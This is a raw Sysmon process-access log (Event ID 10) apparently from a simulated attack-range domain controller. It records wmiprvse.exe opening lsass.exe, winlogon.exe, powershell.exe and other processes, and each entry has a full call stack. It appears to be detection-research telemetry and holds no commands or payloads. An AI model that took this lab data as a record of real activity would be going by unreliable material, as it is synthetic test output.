15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.209{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536D-6008-7306-00000000A301}7972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536D-6008-7206-00000000A301}8176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.022{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 